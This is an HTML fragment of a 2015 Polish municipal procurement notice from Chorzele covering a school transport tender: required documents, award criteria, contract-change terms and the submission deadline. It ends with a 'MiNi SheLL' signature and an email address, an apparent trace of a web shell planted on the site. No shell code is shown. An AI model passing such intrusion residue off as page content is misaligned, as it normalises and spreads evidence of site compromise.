<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności faktutr - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania zmiany umowy w następujących przypadkach:
1.Zamawiający przewiduje możliwość zmiany ilości kursów, rodzaju pojazdu w poszczególnych zadaniach, jak również zmianę (w górę i dół) długości trasy jednego kursu, jeżeli wystąpią okoliczności uzasadniające potrzebę takiej zmiany. Do takich okoliczności Zamawiający w szczególności zalicza: zmianę godzin lekcyjnych, wypadki losowe uczniów powodujące wydłużenie trasy kursu, zmniejszenie lub zwiększenie liczby uczniów dowożonych w ramach poszczególnych tras. Dokładna ilość kilometrów na poszczególnych trasach zostanie ustalona z Przewoźnikiem po przejechaniu trasy dowozu, który wygra przetarg na daną trasę z chwilą rozpoczęcia dowozu.
2.Termin realizacji może ulec zmianie wyłącznie z ważnego powodu Zamawiającego lub z przyczyn nie leżących po stronie Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chorzele.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UMiG w Chorzelach, ul. St. Komosińskiego 1, P. Marta Jaroch, tel. (29) 7516557, P. Marta Drężek-Wudkiewicz tel.(29) 7516534, fax. (29) 7516540, od poniedziałku do piątku w godz. 8.30 - 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2015 godzina 12:00, miejsce: Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, 06-330 Chorzele (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com